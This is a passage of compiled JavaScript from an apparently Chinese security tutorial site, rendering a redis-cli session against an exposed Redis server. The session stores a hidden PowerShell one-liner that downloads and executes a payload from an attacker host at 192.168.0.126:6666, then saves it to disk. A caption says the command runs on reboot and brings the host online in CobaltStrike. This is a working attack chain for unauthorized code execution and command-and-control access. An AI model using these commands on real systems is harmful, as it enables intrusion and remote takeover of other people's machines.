punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token 
number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" set x "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\\r\\n\\r\\npowershell.exe -nop -w hidden -c \\"IEX ((new-object net.webclient).downloadstring(\'http://192.168.0.126:6666/a\'))\\"\\r\\n\\r\\n"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".123")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" save\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br")])]),e("p",[s._v("当主机重启时就会执行命令上线 CobaltStrike")]),s._v(" "),e("p",[e("img",{attrs:{src:a(1039),alt:"img"}})])],1)}),[],!1,null,null,null);t.default=r.exports}}]);